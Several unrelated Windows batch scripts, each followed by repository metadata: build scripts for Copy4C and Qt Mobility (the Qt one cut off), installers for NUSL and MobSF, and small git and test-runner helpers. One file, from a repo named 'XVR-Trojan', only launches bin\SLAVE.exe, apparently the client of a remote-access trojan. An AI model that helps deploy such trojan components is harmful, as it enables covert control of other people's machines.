call %SRCPATH%\_V2.20.00\Setup.exe -ini "Embedded.ini" -close -all -dir "%PROJECT_ROOT%"
@ECHO.
@ECHO Copy TargetBase
@ECHO -------------------------------------------------------------------------
echo xcopy %SRCPATH%\SysgenV2\V2.20.00.%1\4Control\COM\*.* %PROJECT_ROOT%\COM\*.* /S /Y /Q /K /R /E
xcopy %SRCPATH%\SysgenV2\V2.20.00.%1\4Control\COM\*.* %PROJECT_ROOT%\COM\*.* /S /Y /Q /K /R /E
if errorlevel 1 goto error
echo xcopy %SRCPATH%\SysgenV2\V2.20.00.%1\4Control\Pub\*.* %PROJECT_ROOT%\Pub\*.* /S /Y /Q /K /R /E
xcopy %SRCPATH%\SysgenV2\V2.20.00.%1\4Control\Pub\*.* %PROJECT_ROOT%\Pub\*.* /S /Y /Q /K /R /E
if errorlevel 1 goto error
echo xcopy %SRCPATH%\SysgenV2\V2.20.00.%1\4Control\TargetBase\*.* %TARGET_BASE%\*.* /S /Y /Q /K /R /E
xcopy %SRCPATH%\SysgenV2\V2.20.00.%1\4Control\TargetBase\*.* %TARGET_BASE%\*.* /S /Y /Q /K /R /E
if errorlevel 1 goto error
@ECHO.
@ECHO Get TargetBase from SS
@ECHO -------------------------------------------------------------------------
cd \
cd %TARGET_BASE%
if errorlevel 1 goto error
echo call %SSPATH%\ss get $/4CReleased/V2.20.00/TargetBase -R -I-y -Yln -GL%TARGET_BASE%
call %SSPATH%\ss get $/4CReleased/V2.20.00/TargetBase -R -I-y -Yln -GL%TARGET_BASE%
if errorlevel 1 goto error
@ECHO.
@ECHO Build TargetBase (DEBUG)
@ECHO -------------------------------------------------------------------------
echo make.pl TargetBase_NoLib.inf
make.pl TargetBase_NoLib.inf
if errorlevel 1 goto error
echo nmake /nologo /f TargetBase_NoLib.mak makemake
nmake /nologo /f TargetBase_NoLib.mak makemake
if errorlevel 1 goto error
echo nmake /nologo /f TargetBase_NoLib.mak DEBUG=0 clean
nmake /nologo /f TargetBase_NoLib.mak DEBUG=0 clean
if errorlevel 1 goto error
echo nmake /nologo /f TargetBase_NoLib.mak DEBUG=1 clean
nmake /nologo /f TargetBase_NoLib.mak DEBUG=1 clean
if errorlevel 1 goto error
echo nmake /nologo /f TargetBase_NoLib.mak DEBUG=1 all
nmake /nologo /f TargetBase_NoLib.mak DEBUG=1 all
if errorlevel 1 goto error
@ECHO.
@ECHO Get 4CWin from SS and Build Makefile
@ECHO -------------------------------------------------------------------------
cd \
cd %PROJECT_ROOT%
cd Target
if not exist 4CWin md 4CWin
cd 4CWin
echo call %SSPATH%\ss get $/4CReleased/V2.20.00/Target/4CWin -R -I-y -Yln -GL%PROJECT_ROOT%\Target\4CWin
call %SSPATH%\ss get $/4CReleased/V2.20.00/Target/4CWin -R -I-y -Yln -GL%PROJECT_ROOT%\Target\4CWin
if errorlevel 1 goto error
echo make.pl
make.pl
if errorlevel 1 goto error
echo nmake /nologo /f 4CWin.mak makemake
nmake /nologo /f 4CWin.mak makemake
if errorlevel 1 goto error
@ECHO.
@ECHO Get 4CFC from SS and Build Makefile
@ECHO -------------------------------------------------------------------------
cd \
cd %PROJECT_ROOT%
cd Target
if not exist 4CFC md 4CFC
cd 4CFC
echo call %SSPATH%\ss get $/AOReleased/4CFC_V2.20.00 -R -I-y -Yln -GL%PROJECT_ROOT%\Target\4CFC
call %SSPATH%\ss get $/AOReleased/4CFC_V2.20.00 -R -I-y -Yln -GL%PROJECT_ROOT%\Target\4CFC
if errorlevel 1 goto error
echo make.pl
make.pl
if errorlevel 1 goto error
echo nmake /nologo /f 4CFC.mak makemake
nmake /nologo /f 4CFC.mak makemake
if errorlevel 1 goto error
@ECHO.
@ECHO Get 4CBC from SS and Build Makefile
@ECHO -------------------------------------------------------------------------
cd \
cd %PROJECT_ROOT%
cd Target
if not exist 4CBC md 4CBC
cd 4CBC
echo call %SSPATH%\ss get $/AOReleased/4CBC_V2.20.00 -R -I-y -Yln -GL%PROJECT_ROOT%\Target\4CBC
call %SSPATH%\ss get $/AOReleased/4CBC_V2.20.00 -R -I-y -Yln -GL%PROJECT_ROOT%\Target\4CBC
if errorlevel 1 goto error
echo make.pl
make.pl
if errorlevel 1 goto error
echo nmake /nologo /f 4CBC.mak makemake
nmake /nologo /f 4CBC.mak makemake
if errorlevel 1 goto error
goto end
@REM --------------------------------------------------------------------------
:error
echo.
echo ------- E R R O R -------
echo.
echo Copy4C [BuildNr Targetbase] [Overwrite]
echo [TargetBase]: 3800.r
echo [Overwrite]: DEL KEEP
echo.
:end
cd \
endlocal
|
MECTsrl/ATCMcontrol_Engineering
|
src/Tools/Develop/Copy4C_V220.bat
|
bat
|
gpl-3.0
| 6,147 |
bin\SLAVE.exe
|
Xerados/XVR-Trojan
|
slave/run.bat
|
bat
|
gpl-3.0
| 14 |
@echo off
COLOR 1F
TITLE NUSL Installer
mode con cols=85 lines=25
set ver=1.0
set NUSLmin=/min
set updatelink=http://nusl.googlecode.com/files/
set nuslver=v0.1beta4.zip
set nuslvers=0.1 beta4
set dl=%updatelink%%nuslver%
:top
CLS
set Loc=
echo NUSL Installer v%ver%
echo by the WiiDatabase Team
echo.
echo Wo mchtest du NUSL hininstallieren?
echo.
echo.
echo L = Lokale Installation
echo * Installiert in %homedrive%\NUSL
echo.
echo.
echo D = Desktop Instalaltion
echo * Installiert in %userprofile%\Desktop\NUSL
echo.
echo.
echo P = Portable Installation
echo * Installiert in selbstausgewhltem Verzeichnis
echo.
echo.
echo E = Beenden ohne NUSL zu installieren
echo.
echo.
set /p Loc= Eingabe:
if /i "%Loc%" EQU "L" set InstallPath=%homedrive%\NUSL
if /i "%Loc%" EQU "L" goto:updaterpage3
if /i "%Loc%" EQU "D" set InstallPath=%userprofile%\Desktop\NUSL
if /i "%Loc%" EQU "D" goto:updaterpage3
if /i "%Loc%" EQU "P" goto:Portable
if /i "%Loc%" EQU "E" exit
echo Dies ist keine gltige Eingabe!
@ping 127.0.0.1 -n 2 -w 1000> nul
goto:top
:Portable
set InstallPathTemp=
cls
echo NUSL Installer v%ver%
echo by the WiiDatabase Team
echo.
echo.
echo Gebe den Laufwerksbuchstaben oder den Pfad fr die Installation an:
echo.
echo.
echo Beispiele:
echo ==========
echo.
echo E:\NUSL
echo.
echo F:
echo.
echo G:\PortableApps\NUSL
echo.
echo.
echo Z = Zurck
echo.
echo B = Beenden ohne NUSL zu installieren
echo.
echo.
set /p InstallPathTemp= Enter Selection Here:
IF "%InstallPathTemp%"=="" echo You Have Entered an Incorrect Key
IF "%InstallPathTemp%"=="" goto:Portable
if /i "%InstallPathTemp%" EQU "Z" goto:top
if /i "%InstallPathTemp%" EQU "B" exit
::remove quotes from variable (if applicable)
echo "set InstallPathTemp=%InstallPathTemp%">temp.txt
sfk filter -quiet temp.txt -rep _""""__>temp.bat
call temp.bat
del temp.bat>nul
del temp.txt>nul
:doublecheck
set fixslash=
if /i "%InstallPathTemp:~-1%" EQU "\" set fixslash=yes
if /i "%InstallPathTemp:~-1%" EQU "/" set fixslash=yes
if /i "%fixslash%" EQU "yes" set InstallPathTemp=%InstallPathTemp:~0,-1%
if /i "%fixslash%" EQU "yes" goto:doublecheck
::if second char is ":" check if drive exists
if /i "%InstallPathTemp:~1,1%" NEQ ":" goto:skipcheck
if exist "%InstallPathTemp:~0,2%" (goto:skipcheck) else (echo.)
echo %InstallPathTemp:~0,2% existiert nicht, versuche es erneut...
@ping 127.0.0.1 -n 2 -w 1000> nul
goto:Portable
:skipcheck
set InstallPath=%InstallPathTemp%
goto:updaterpage3
:updaterpage3
set shortcut=
cls
echo NUSL Installer v%ver%
echo by the WiiDatabase Team
echo.
echo.
echo Mchtest du NUSL Shortcuts installieren?
echo.
echo.
echo.
echo D = Desktop
echo.
echo K = Keine
echo.
echo.
echo Z = Zurck
echo.
echo B = Beenden ohne NUSL zu installieren
echo.
echo.
set /p shortcut= Enter Selection Here:
if /i "%shortcut%" EQU "B" exit
if /i "%shortcut%" EQU "D" goto:updaterpageconfirm
if /i "%shortcut%" EQU "K" goto:updaterpageconfirm
if /i "%proceed%" EQU "L" goto:backto1
if /i "%proceed%" EQU "D" goto:backto1
if /i "%shortcut%" EQU "Z" goto:top
:backto1
if /i "%shortcut%" EQU "Z" goto:updaterpage
echo Dies ist keine gltige Eingabe!
@ping 127.0.0.1 -n 2 -w 1000> nul
goto:updaterpage3
:updaterpageconfirm
set updateconfirm=
cls
echo NUSL Installer v%ver%
echo by the WiiDatabase Team
echo.
echo.
echo Installiere NUSL mit diesen Einstellungen?
echo.
echo.
echo * Installiere NUSL in:
echo - %InstallPath%
echo.
if /i "%shortcut%" EQU "D" echo * Installiere NUSL Shortcut
if /i "%shortcut%" EQU "K" echo * Installiere keinen NUSL Shortcut
echo.
echo.
echo.
echo.
echo J = Ja!
echo.
echo Z = Zurck
echo.
echo B = Beenden ohne NUSL zu installieren
echo.
echo.
set /p updateconfirm= Enter Selection Here:
if /i "%updateconfirm%" EQU "B" exit
if /i "%updateconfirm%" EQU "J" goto:proceed
if /i "%updateconfirm%" EQU "Z" goto:updaterpage3
echo Dies ist keine gltige Eingabe!
@ping 127.0.0.1 -n 2 -w 1000> nul
goto:updaterpageconfirm
:proceed
if exist %nuslver% goto :entpacke
CLS
echo NUSL Installer v%ver%
echo by the WiiDatabase Team
echo.
echo.
echo Downloade NUSL v%nuslvers%
mkdir temp
if not exist %InstallPath% mkdir %InstallPath%
start %NUSLmin%/wait wget -t 3 %dl%
:entpacke
CLS
if not exist temp mkdir temp
if not exist %InstallPath% mkdir %InstallPath%
echo NUSL Installer v%ver%
echo by the WiiDatabase Team
echo.
echo.
echo Entpacke NUSL v%nuslvers%
echo.
start %NUSLmin%/wait 7za e %nuslver% -otemp
::---------------------------------------------Ab hier wird verschoben! Immer anpassen!----
move /y temp\NUSL.bat %InstallPath%
mkdir %InstallPath%\Support
move /y temp\7za.exe %InstallPath%\Support
move /y temp\nusd.exe %InstallPath%\Support
move /y temp\settings.bat %InstallPath%\Support
move /y temp\settings.exe %InstallPath%\Support
move /y temp\sfk.exe %InstallPath%\Support
move /y temp\wget.exe %InstallPath%\Support
move /y temp\wit.exe %InstallPath%\Support
move /y temp\wwt.exe %InstallPath%\Support
rmdir /s /q temp
if exist Support rmdir /s /q Support
if /i "%shortcut%" EQU "D" nircmd.exe shortcut "%InstallPath%\NUSL.bat" "~$folder.desktop$" "NUSL" "" "%cd%\icon.ico"
del %nuslver%
CLS
echo NUSL Installer v%ver%
echo.
echo.
echo NUSL wurde instaliert!
start %InstallPath%
@ping 127.0.0.1 -n 5 -w 1000> nul
exit
|
Brawl345/GoogleCodeExport
|
nusl/Installer/v1.0/NUSLInstaller.bat
|
bat
|
gpl-3.0
| 5,816 |
@echo off
rem Python Check
set /a count=0
where python >nul 2>&1 && (
echo [INSTALL] Checking for Python version 3.8+
:redo
if %count% lss 3 (
set /a count+=1
rem Python Version Check
for /F "tokens=* USEBACKQ" %%F IN (`python --version`) DO (
set var=%%F
)
) else (
exit /b
)
echo %var%|findstr /R "[3].[89]" >nul
if errorlevel 1 (
if "%var%"=="" goto redo
echo [ERROR] MobSF dependencies require Python 3.8/3.9. Your python points to %var%
exit /b
) else (
echo [INSTALL] Found %var%
)
rem Pip Check and Upgrade
pip >nul 2>&1 && (
echo [INSTALL] Found pip
python -m pip install --no-cache-dir --upgrade pip
) || (
echo [ERROR] pip is not available in PATH
pause
exit /b
)
rem OpenSSL Check
if exist "C:\\Program Files\\OpenSSL-Win64\\bin\\openssl.exe" (
echo [INSTALL] Found OpenSSL executable
) else (
echo [ERROR] OpenSSL executable not found in [C:\\Program Files\\OpenSSL-Win64\\bin\\openssl.exe]
echo [INFO] Install OpenSSL non-light version - https://slproweb.com/download/Win64OpenSSL-3_0_0.exe
pause
exit /b
)
rem Visual Studio Build Tools Check
if exist "C:\\Program Files (x86)\\Microsoft Visual Studio" (
echo [INSTALL] Found Visual Studio Build Tools
) else (
echo [ERROR] Microsoft Visual C++ 14.0 not found in [C:\\Program Files (x86^)\\Microsoft Visual Studio]
echo [INFO] Install Microsoft Visual Studio Build Tools - https://visualstudio.microsoft.com/thank-you-downloading-visual-studio/?sku=BuildTools^&rel=16
pause
exit /b
)
rem Create venv
echo [INSTALL] Creating venv
rmdir "venv" /q /s >nul 2>&1
python -m venv ./venv
set venv=.\venv\Scripts\python
%venv% -m pip install --upgrade pip
set LIB=C:\Program Files\OpenSSL-Win64\lib;%LIB%
set INCLUDE=C:\Program Files\OpenSSL-Win64\include;%INCLUDE%
echo [INSTALL] Installing Requirements
%venv% -m pip install --no-cache-dir wheel
%venv% -m pip install --no-cache-dir --use-deprecated=legacy-resolver -r requirements.txt
echo [INSTALL] Clean Up
call scripts/clean.bat y
echo [INSTALL] Migrating Database
%venv% manage.py makemigrations
%venv% manage.py makemigrations StaticAnalyzer
%venv% manage.py migrate
echo Download and Install wkhtmltopdf for PDF Report Generation - https://wkhtmltopdf.org/downloads.html
echo [INSTALL] Installation Complete
%venv% scripts/check_install.py
exit /b 0
) || (
echo [ERROR] python3 is not installed
)
|
MobSF/Mobile-Security-Framework-MobSF
|
setup.bat
|
bat
|
gpl-3.0
| 2,512 |
@echo off
git reset --hard
|
th3mon/scripts
|
bash/windows/git-clear.cmd
|
bat
|
gpl-3.0
| 28 |
<TFS Server> <Project name> <test plan Number> <path to input file> <Name for test run>
REM XMLResultImporter.exe "https://xxx.visualstudio.com/DefaultCollection" XXX XXXXX "C\XMLResultImporter\Input.xml" SpecflowTestRun
pause
|
NidhiThakur/xml-result-importer
|
Run.bat
|
bat
|
agpl-3.0
| 230 |
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::
:: Copyright (C) 2010 Nokia Corporation and/or its subsidiary(-ies).
:: All rights reserved.
:: Contact: Nokia Corporation ([email protected])
::
:: This file is part of the Qt Mobility Components.
::
:: $QT_BEGIN_LICENSE:LGPL$
:: Commercial Usage
:: Licensees holding valid Qt Commercial licenses may use this file in
:: accordance with the Qt Solutions Commercial License Agreement provided
:: with the Software or, alternatively, in accordance with the terms
:: contained in a written agreement between you and Nokia.
::
:: GNU Lesser General Public License Usage
:: Alternatively, this file may be used under the terms of the GNU Lesser
:: General Public License version 2.1 as published by the Free Software
:: Foundation and appearing in the file LICENSE.LGPL included in the
:: packaging of this file. Please review the following information to
:: ensure the GNU Lesser General Public License version 2.1 requirements
:: will be met: http://www.gnu.org/licenses/old-licenses/lgpl-2.1.html.
::
:: In addition, as a special exception, Nokia gives you certain additional
:: rights. These rights are described in the Nokia Qt LGPL Exception
:: version 1.1, included in the file LGPL_EXCEPTION.txt in this package.
::
:: GNU General Public License Usage
:: Alternatively, this file may be used under the terms of the GNU
:: General Public License version 3.0 as published by the Free Software
:: Foundation and appearing in the file LICENSE.GPL included in the
:: packaging of this file. Please review the following information to
:: ensure the GNU General Public License version 3.0 requirements will be
:: met: http://www.gnu.org/copyleft/gpl.html.
::
:: Please note Third Party Software included with Qt Solutions may impose
:: additional restrictions and it is the user's responsibility to ensure
:: that they have met the licensing requirements of the GPL, LGPL, or Qt
:: Solutions Commercial license and the relevant license of the Third
:: Party Software they are using.
::
:: If you are unsure which license is appropriate for your use, please
:: contact the sales department at [email protected].
:: $QT_END_LICENSE$
::
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
@echo off
set QT_MOBILITY_PREFIX= C:\QtMobility
set BUILD_PATH=%CD%
set SOURCE_PATH= %~dp0
cd /D %SOURCE_PATH%
set SOURCE_PATH=%CD%
cd /D %BUILD_PATH%
set PROJECT_CONFIG=%BUILD_PATH%\config.in
set PROJECT_LOG=%BUILD_PATH%\config.log
set RELEASEMODE=release
set WIN32_RELEASEMODE=debug_and_release build_all
set QT_MOBILITY_LIB=
set BUILD_UNITTESTS=no
set BUILD_EXAMPLES=no
set BUILD_DOCS=yes
set BUILD_TOOLS=yes
set MOBILITY_MODULES=bearer location contacts multimedia publishsubscribe versit messaging systeminfo serviceframework sensors
set MOBILITY_MODULES_UNPARSED=
set VC_TEMPLATE_OPTION=
set QT_PATH=
set QMAKE_CACHE=%BUILD_PATH%\.qmake.cache
REM We use these variables to indicate which modules are selected
REM They are used for example to see which modules need config.tests built
set CONTACTS_SELECTED=yes
set BEARER_SELECTED=yes
set SYSTEMINFO_SELECTED=yes
set SENSORS_SELECTED=yes
set MESSAGING_SELECTED=yes
set MULTIMEDIA_SELECTED=yes
set LOCATION_SELECTED=yes
if exist "%QMAKE_CACHE%" del /Q %QMAKE_CACHE%
if exist "%PROJECT_LOG%" del /Q %PROJECT_LOG%
if exist "%PROJECT_CONFIG%" del /Q %PROJECT_CONFIG%
echo QT_MOBILITY_SOURCE_TREE = %SOURCE_PATH% > %QMAKE_CACHE%
echo QT_MOBILITY_BUILD_TREE = %BUILD_PATH% >> %QMAKE_CACHE%
set QMAKE_CACHE=
:cmdline_parsing
if "%1" == "" goto startProcessing
if "%1" == "-debug" goto debugTag
if "%1" == "-release" goto releaseTag
if "%1" == "-silent" goto silentTag
if "%1" == "-prefix" goto prefixTag
if "%1" == "-libdir" goto libTag
if "%1" == "-bindir" goto binTag
if "%1" == "-headerdir" goto headerTag
if "%1" == "-plugindir" goto pluginTag
if "%1" == "-tests" goto testTag
if "%1" == "-examples" goto exampleTag
if "%1" == "-qt" goto qtTag
if "%1" == "-vc" goto vcTag
if "%1" == "-no-docs" goto nodocsTag
if "%1" == "-no-tools" goto noToolsTag
if "%1" == "-modules" goto modulesTag
if "%1" == "/?" goto usage
if "%1" == "-h" goto usage
if "%1" == "-help" goto usage
if "%1" == "--help" goto usage
if "%1" == "-symbian-unfrozen" goto unfrozenTag
echo Unknown option: "%1"
goto usage
:usage
echo Usage: configure.bat [-prefix (dir)] [headerdir (dir)] [libdir (dir)]
echo [-bindir (dir)] [-tests] [-examples]
echo [-debug] [-release] [-silent]
echo.
echo Options:
echo.
echo -prefix (dir) ..... This will install everything relative to dir
echo (default prefix: C:\QtMobility)
echo -headerdir (dir) .. Header files will be installed to dir
echo (default prefix: PREFIX/include)
echo -libdir (dir) ..... Libraries will be installed to dir
echo (default PREFIX/lib)
echo -bindir (dir) ..... Executables will be installed to dir
echo (default PREFIX/bin)
echo -plugindir (dir) .. Plug-ins will be installed to dir
echo (default PREFIX/plugins)
echo -debug ............ Build with debugging symbols
echo -release .......... Build without debugging symbols
echo -silent ........... Reduces build output
echo -tests ............ Build unit tests (not build by default)
echo Note, this adds test symbols to all libraries
echo and should not be used for release builds.
echo -examples ......... Build example applications
echo -no-docs .......... Do not build documentation (build by default)
echo -modules ^<list^> ... Build only the specified modules (default all)
echo Choose from: bearer contacts location publishsubscribe
echo messaging multimedia systeminfo serviceframework versit
echo sensors
echo Modules should be separated by a space and surrounded
echo by double quotation. If a
echo selected module depends on other modules dependencies
echo will automatically be enabled.
echo -vc ............... Generate Visual Studio make files
if exist "%PROJECT_CONFIG%" del %PROJECT_CONFIG%
goto exitTag
:qtTag
shift
set QT_PATH=%1\
shift
goto cmdline_parsing
:debugTag
if "%RELEASEMODE%" == "release" set RELEASEMODE=debug
set WIN32_RELEASEMODE=
shift
goto cmdline_parsing
:releaseTag
if "%RELEASEMODE%" == "debug" set RELEASEMODE=release
set WIN32_RELEASEMODE=
shift
goto cmdline_parsing
:silentTag
echo CONFIG += silent > %PROJECT_CONFIG%
shift
goto cmdline_parsing
:prefixTag
shift
set QT_MOBILITY_PREFIX=%1
shift
goto cmdline_parsing
:libTag
shift
echo QT_MOBILITY_LIB = %1 >> %PROJECT_CONFIG%
shift
goto cmdline_parsing
:binTag
shift
echo QT_MOBILITY_BIN = %1 >> %PROJECT_CONFIG%
shift
goto cmdline_parsing
:headerTag
shift
echo QT_MOBILITY_INCLUDE = %1 >> %PROJECT_CONFIG%
shift
goto cmdline_parsing
:pluginTag
shift
echo QT_MOBILITY_PLUGINS = %1 >> %PROJECT_CONFIG%
shift
echo
goto cmdline_parsing
:unfrozenTag
REM Should never be used in release builds
REM Some SDK's seem to exclude Q_AUTOTEST_EXPORT symbols if the
REM libraries are frozen. This breaks unit tests relying on the auto test exports
REM This flag unfreezes the SYMBIAN libraries for the purpose of unit test building.
REM Ideally this should be connected to '-tests' option but that would prevent
REM integration testing for frozen symbols as the CI system should test unit tests
REM and frozen symbol compliance.
echo symbian_symbols_unfrozen = 1 >> %PROJECT_CONFIG%
shift
goto cmdline_parsing
:testTag
set BUILD_UNITTESTS=yes
shift
goto cmdline_parsing
:exampleTag
set BUILD_EXAMPLES=yes
shift
goto cmdline_parsing
:vcTag
shift
set VC_TEMPLATE_OPTION=-tp vc
goto cmdline_parsing
:nodocsTag
set BUILD_DOCS=no
shift
goto cmdline_parsing
:noToolsTag
set BUILD_TOOLS=no
shift
goto cmdline_parsing
:modulesTag
shift
:: %1 can have leading/trailing quotes, so we can't use if "%1" == ""
if xx%1xx == xxxx (
echo. >&2
echo >&2The -modules option requires a list of modules.
echo. >&2
goto usage
)
:: Remove leading/trailing quotes, if we have them
set MOBILITY_MODULES_UNPARSED=xxx%1xxx
set MOBILITY_MODULES_UNPARSED=%MOBILITY_MODULES_UNPARSED:"xxx=%
set MOBILITY_MODULES_UNPARSED=%MOBILITY_MODULES_UNPARSED:xxx"=%
set MOBILITY_MODULES_UNPARSED=%MOBILITY_MODULES_UNPARSED:xxx=%
REM reset default modules as we expect a modules list
set MOBILITY_MODULES=
set CONTACTS_SELECTED=
set BEARER_SELECTED=
set SYSTEMINFO_SELECTED=
set SENSORS_SELECTED=
set MESSAGING_SELECTED=
set MULTIMEDIA_SELECTED=
set LOCATION_SELECTED=
echo Checking selected modules:
:modulesTag2
for /f "tokens=1,*" %%a in ("%MOBILITY_MODULES_UNPARSED%") do (
set FIRST=%%a
set REMAINING=%%b
)
: What we want is a switch as we need to check module name and only want to
: distinguish between false and correct module names being passed
if %FIRST% == bearer (
echo Bearer Management selected
set BEARER_SELECTED=yes
) else if %FIRST% == contacts (
echo Contacts selected
set CONTACTS_SELECTED=yes
) else if %FIRST% == location (
echo Location selected
set LOCATION_SELECTED=yes
) else if %FIRST% == messaging (
echo Messaging selected
set MESSAGING_SELECTED=yes
) else if %FIRST% == multimedia (
echo Multimedia selected
set MULTIMEDIA_SELECTED=yes
) else if %FIRST% == publishsubscribe (
echo PublishSubscribe selected
) else if %FIRST% == systeminfo (
echo Systeminfo selected
set SYSTEMINFO_SELECTED=yes
) else if %FIRST% == serviceframework (
echo ServiceFramework selected
) else if %FIRST% == versit (
echo Versit selected ^(implies Contacts^)
set CONTACTS_SELECTED=yes
) else if %FIRST% == sensors (
echo Sensors selected
set SENSORS_SELECTED=yes
) else (
echo Unknown module %FIRST%
goto errorTag
)
set MOBILITY_MODULES=%MOBILITY_MODULES% %FIRST%
if "%REMAINING%" == "" (
shift
) else (
set MOBILITY_MODULES_UNPARSED=%REMAINING%
goto modulesTag2
)
SET REMAINING=
SET FIRST=
goto cmdline_parsing
:startProcessing
echo CONFIG += %RELEASEMODE% >> %PROJECT_CONFIG%
echo CONFIG_WIN32 += %WIN32_RELEASEMODE% %RELEASEMODE% >> %PROJECT_CONFIG%
set RELEASEMODE=
set WIN32_RELEASEMODE=
set CURRENTDIR=%CD%
echo %CURRENTDIR%
if exist %QT_MOBILITY_PREFIX% goto prefixExists
mkdir %QT_MOBILITY_PREFIX%
if errorlevel 1 goto invalidPrefix
cd /D %QT_MOBILITY_PREFIX%
set QT_MOBILITY_PREFIX=%CD%
cd /D %CURRENTDIR%
rd /S /Q %QT_MOBILITY_PREFIX%
goto endprefixProcessing
:invalidPrefix
echo "%QT_MOBILITY_PREFIX%" is not a valid directory path.
goto :exitTag
:prefixExists
cd /D %QT_MOBILITY_PREFIX%
set QT_MOBILITY_PREFIX=%CD%
cd /D %CURRENTDIR%
:endprefixProcessing
echo QT_MOBILITY_PREFIX = %QT_MOBILITY_PREFIX% >> %PROJECT_CONFIG%
echo build_unit_tests = %BUILD_UNITTESTS% >> %PROJECT_CONFIG%
set BUILD_UNITTESTS=
echo build_examples = %BUILD_EXAMPLES% >> %PROJECT_CONFIG%
set BUILD_EXAMPLES=
echo build_docs = %BUILD_DOCS% >> %PROJECT_CONFIG%
set BUILD_DOCS=
echo build_tools = %BUILD_TOOLS% >> %PROJECT_CONFIG%
set BUILD_TOOLS=
echo qmf_enabled = no >> %PROJECT_CONFIG%
echo !symbian:isEmpty(QT_MOBILITY_INCLUDE):QT_MOBILITY_INCLUDE=$$QT_MOBILITY_PREFIX/include >> %PROJECT_CONFIG%
echo isEmpty(QT_MOBILITY_LIB):QT_MOBILITY_LIB=$$QT_MOBILITY_PREFIX/lib >> %PROJECT_CONFIG%
echo isEmpty(QT_MOBILITY_BIN):QT_MOBILITY_BIN=$$QT_MOBILITY_PREFIX/bin >> %PROJECT_CONFIG%
echo isEmpty(QT_MOBILITY_PLUGINS):QT_MOBILITY_PLUGINS=$$QT_MOBILITY_PREFIX/plugins >> %PROJECT_CONFIG%
echo mobility_modules = %MOBILITY_MODULES% >> %PROJECT_CONFIG%
REM no Sysinfo support on Maemo yet
echo maemo5^|maemo6:mobility_modules -= systeminfo >> %PROJECT_CONFIG%
echo contains(mobility_modules,versit): mobility_modules *= contacts >> %PROJECT_CONFIG%
echo Checking available Qt
call %QT_PATH%qmake -v >> %PROJECT_LOG% 2>&1
if errorlevel 1 goto qmakeNotFound
goto qmakeFound
:qmakeNotFound
echo ... Not found >> %PROJECT_LOG% 2>&1
if "%QT_PATH%" == "" (
echo >&2Cannot find 'qmake' in your PATH.
echo >&2Your PATH is: %PATH%
) else (
echo >&2Cannot find 'qmake' in %QT_PATH%.
)
echo >&2Aborting.
goto errorTag
:qmakeFound
call %QT_PATH%qmake -query QT_VERSION
goto checkMake
:makeTest
setlocal
set CURRENT_PWD=%CD%
if %BUILD_PATH% == %SOURCE_PATH% (
cd %SOURCE_PATH%\config.tests\make
if exist make del make
) else (
rmdir /S /Q config.tests\make
mkdir config.tests\make
cd config.tests\make
)
for /f "tokens=2,3" %%a in ('call %QT_PATH%qmake %SOURCE_PATH%\config.tests\make\make.pro 2^>^&1 1^>NUL') do (
if "%%a" == "MESSAGE:" (
set BUILDSYSTEM=%%b)
)
if "%BUILDSYSTEM%" == "symbian-abld" (
call make -h >> %PROJECT_LOG% 2>&1
if not errorlevel 1 (
echo ... Symbian abld make found.
set MAKE=make
)
) else if "%BUILDSYSTEM%" == "symbian-sbsv2" (
call make -h >> %PROJECT_LOG% 2>&1
if not errorlevel 1 (
echo ... Symbian sbsv2 make found.
set MAKE=make
)
) else if "%BUILDSYSTEM%" == "win32-nmake" (
call nmake /? >> %PROJECT_LOG% 2>&1
if not errorlevel 1 (
echo ... nmake found.
set MAKE=nmake
)
) else if "%BUILDSYSTEM%" == "win32-mingw" (
call mingw32-make -v >> %PROJECT_LOG% 2>&1
if not errorlevel 1 (
echo ... mingw32-make found.
set MAKE=mingw32-make
)
) else (
echo ... Unknown target environment %BUILDSYSTEM%.
)
call cd %CURRENT_PWD%
call endlocal&set %1=%MAKE%&set %2=%BUILDSYSTEM%&goto :EOF
:checkMake
echo Checking make
call :makeTest MOBILITY_MAKE MOBILITY_BUILDSYSTEM
if not "%MOBILITY_MAKE%" == "" goto compileTests
echo >&2Cannot find 'nmake', 'mingw32-make' or 'make' in your PATH
echo >&2Aborting.
goto errorTag
:compileTest
setlocal
@echo off
echo Checking %1
set CURRENT_PWD=%CD%
if %BUILD_PATH% == %SOURCE_PATH% (
cd %SOURCE_PATH%\config.tests\%2
if exist %2 del %2
) else (
rmdir /S /Q config.tests\%2
mkdir config.tests\%2
cd config.tests\%2
)
call %QT_PATH%qmake %SOURCE_PATH%\config.tests\%2\%2.pro >> %PROJECT_LOG% 2>&1
set FAILED=0
if "%MOBILITY_BUILDSYSTEM%" == "symbian-sbsv2" (
call %MOBILITY_MAKE% release-armv5 >> %PROJECT_LOG% 2>&1
for /f "tokens=2" %%i in ('%MOBILITY_MAKE% release-armv5 SBS^="@sbs --check"') do set FAILED=1
call %MOBILITY_MAKE% clean >> %PROJECT_LOG% 2>&1
) else if "%MOBILITY_BUILDSYSTEM%" == "symbian-abld" (
call %MOBILITY_MAKE% release-gcce >> %PROJECT_LOG% 2>&1
for /f "tokens=2" %%i in ('%MOBILITY_MAKE% release-gcce ABLD^="@ABLD.BAT -c" 2^>^&1') do if not %%i == bldfiles set FAILED=1
call %MOBILITY_MAKE% clean >> %PROJECT_LOG% 2>&1
) else {
REM Make for other builds
call %MOBILITY_MAKE% >> %PROJECT_LOG% 2>&1
REM have to check error level for windows / other builds to be sure.
if errorlevel 1 (
set FAILED=1
)
)
if %FAILED% == 0 (
echo ... OK
echo %2_enabled = yes >> %PROJECT_CONFIG%
) else (
echo ... Not Found
echo %2_enabled = no >> %PROJECT_CONFIG%
)
cd %CURRENT_PWD%
endlocal&goto :EOF
:compileTests
echo.
echo Start of compile tests
REM compile tests go here.
for /f "tokens=3" %%i in ('call %QT_PATH%qmake %SOURCE_PATH%\config.tests\make\make.pro 2^>^&1 1^>NUL') do set BUILDSYSTEM=%%i
if "%BUILDSYSTEM%" == "symbian-abld" goto symbianTests
if "%BUILDSYSTEM%" == "symbian-sbsv2" goto symbianTests
goto windowsTests
:symbianTests
if "%MULTIMEDIA_SELECTED%" == "yes" (
call :compileTest Audiorouting_s60 audiorouting_s60
call :compileTest Tunerlibrary_for_3.1 tunerlib_s60
call :compileTest RadioUtility_for_post_3.1 radioutility_s60
call :compileTest OpenMaxAl_support openmaxal_symbian
call :compileTest Surfaces_s60 surfaces_s60
)
if "%CONTACTS_SELECTED%" == "yes" (
call :compileTest SymbianContactSIM symbiancntsim
)
if "%BEARER_SELECTED%" == "yes" (
